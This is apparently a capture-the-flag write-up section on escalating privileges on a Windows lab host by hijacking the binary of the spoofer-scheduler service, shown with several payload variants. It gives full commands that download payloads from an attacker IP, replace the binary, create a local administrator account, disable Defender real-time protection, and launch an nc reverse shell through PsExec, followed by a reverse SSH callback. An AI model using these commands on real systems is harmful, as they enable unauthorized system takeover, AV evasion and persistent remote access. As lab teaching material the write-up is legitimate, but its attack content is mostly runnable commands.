Service Hijacking
It has been identified that the current user, tyler, is able to modify the service binary of the spoofer-scheduler service and to restart the service the HACKSMARTERSEC(10.10.183.209) host. As the spoofer-scheduler service is running as SYSTEM, privilege escalation is achievable by hijacking the service binary and restarting the service.
The HACKSMARTERSEC(10.10.183.209) host has AV enabled and enforced.
Executing malicious PE file will be flagged and removed by AV.
Thus, the following 4 payloads were created;
MASM
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"Hijacking the service binary with the payload.
PS C:\tmp> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.Restarting the spoofer-scheduler service.
PS C:\tmp> net user adm1n
User name adm1n
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/5/2025 5:31:10 PM
Password expires 8/16/2025 5:31:10 PM
Password changeable 7/5/2025 5:31:10 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.It executed the payload and a local administrator user was created.
┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ xfreerdp /u:adm1n /p:'Qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0 
System level compromise.
Nim-Reverse-Shell
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/Nim-Reverse-Shell/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"Hijacking the service binary with the payload.
PS C:\tmp> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-schedulerRestarting the spoofer-scheduler service.
System level compromise.
C
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"Hijacking the service binary with the payload.
PS C:\> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x0
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.Restarting the spoofer-scheduler service.
PS C:\> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
tyler
The command completed successfully.The current user, tyler, is now part of the Administrators group.
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true ; Set-MpPreference -DisableIOAVProtection $true ; Set-MpPreference -DisableScr
iptScanning 1Disabling AV
PS C:\> curl http://10.9.0.130/nc64.exe -OutFile C:\tmp\nc64.exe
PS C:\> curl http://10.9.0.130/PsExec64.exe -OutFile C:\tmp\PsExec64.exe
PS C:\> C:\tmp\PsExec64.exe -accepteula -i -s cmd.exe /c "C:\tmp\nc64.exe 10.9.0.130 1234 -e cmd"
PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.comSending a reverse shell via PsExec.exe
System level compromise.
update_script
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/update_script/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" Hijacking the service binary with the payload.
PS C:\> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x0
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.Restarting the spoofer-scheduler service.
Stager fetched
System level compromise.
reverse_ssh
simply best one. yet. overkill.
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130:3232/f34c0affc1580f49c4fc6f5c6217096d -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"Hijacking the service binary with the payload.
Fetched from the RSSH server on Kali
PS C:\> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x0
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2668
FLAGS :Restarting the spoofer-scheduler service.
Inbound SSH connection to the RSSH server on Kali.
catcher$ ls -t
Targets
+------------------------------------------+--------+--------------------------------------+
| IDs | Owners | Version |
+------------------------------------------+--------+--------------------------------------+
| b805d060a335eac6249674b8c75e98195764f25b | public | SSH-v2.6.18-2-gd042bc4-windows_amd64 |
| da97814cf2d2bc531f198600080929ed2ef6909a | | |
| workgroup.hacksmartersec..hacksmartersec | | |
| 10.10.90.93:49751 | | |
+------------------------------------------+--------+--------------------------------------+The RSSH server on Kali now shows an agent Those IDs are all aliases for a single agent.
┌──(kali㉿kali)-[~]
└─$ ssh -J localhost:3232 workgroup.hacksmartersec..hacksmartersec
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
The authenticity of host 'workgroup.hacksmartersec..hacksmartersec (<no hostip for proxy command>)' can't be established.
ED25519 key fingerprint is SHA256:NRut4OK6SEMyAuOYUuzTIs0c0Hvrq1ooAXb0sbLlAFY.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:291: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'workgroup.hacksmartersec..hacksmartersec' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519': Connecting..
catcher$ connect workgroup.hacksmartersec..hacksmartersecOr like this
System level compromise.